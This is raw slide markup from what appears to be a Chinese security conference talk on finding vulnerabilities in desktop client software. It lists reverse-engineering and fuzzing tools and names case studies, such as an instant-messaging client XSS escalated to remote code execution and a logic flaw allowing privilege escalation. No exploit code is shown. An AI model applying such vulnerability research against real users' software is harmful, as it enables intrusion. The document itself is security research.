                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Fuzzer</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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Boofuzz</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>其他</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Cheat Engine</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a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ProcessHacker</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 altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>HRSword</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>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en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IDA</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>插件推荐集合：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>https://</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>github.com</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>/HACK-THE-WORLD/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IDAPluginList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F3AAF031-D1C1-4E01-17DD-5CFA3DC98023}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="252862" y="3528321"/>
              <a:ext cx="3850258" cy="2576905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="图片 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E531098E-36EA-525A-7CA1-224B1775D9F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4288751" y="3528321"/>
              <a:ext cx="3850258" cy="2576904"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="图片 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7F1B2B0-AC67-21EB-A3B9-22D2CA0174EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8324639" y="3528321"/>
              <a:ext cx="3676459" cy="2576904"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422407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66565"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感谢名单</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5551456"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
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF18ECCF-82DD-E58F-E68A-F80A71DFC0A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303596" y="2485925"/>
            <a:ext cx="9584808" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>感谢以下人员，对于本议题的支持和帮助</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>毁三观大人、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>AllySwitch</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2ero</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2730389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945560" y="838625"/>
            <a:ext cx="4822731" cy="1455588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="945558" y="2669413"/>
            <a:ext cx="1089088" cy="45719"/>
            <a:chOff x="3232298" y="1892595"/>
            <a:chExt cx="1089088" cy="53163"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 1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44239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66565" y="2987526"/>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议题介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5681330" y="3661198"/>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50257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议题介绍</a:t>
            </a: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
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CCA6CFB-19F7-FB36-FE5E-010C3A4F5374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2551837"/>
            <a:ext cx="10515600" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>议题标题：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>被忽视的暗面：客户端应用漏洞挖掘之旅</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>议题概要：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>客户端应用漏洞是许多人在进行漏洞挖掘和安全测试时容易忽视的领域。随着技术的更迭和攻防手段的升级，客户端应用漏洞也逐渐出现在大众视野中（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击、攻防赛事等等），在本次议题中，我们将重点关注</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>侧的客户端应用程序，如即时通讯、远程服务、视频软件等应用，探索其中存在的漏洞和潜在的安全风险。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1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2981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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1762424" y="2496166"/>
            <a:ext cx="1533525" cy="3994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altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>IM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1762424" y="2895580"/>
            <a:ext cx="4122106" cy="855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 altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>A-IM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>即时通讯）客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" charset="-122"/>
              <a:cs typeface="Microsoft YaHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>B-IM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>即时通讯）客户端逻辑校验问题导致越权。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7357130" y="2496166"/>
            <a:ext cx="1533525" cy="3994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altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7357130" y="2895580"/>
            <a:ext cx="3876376" cy="21970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 altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>A-VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
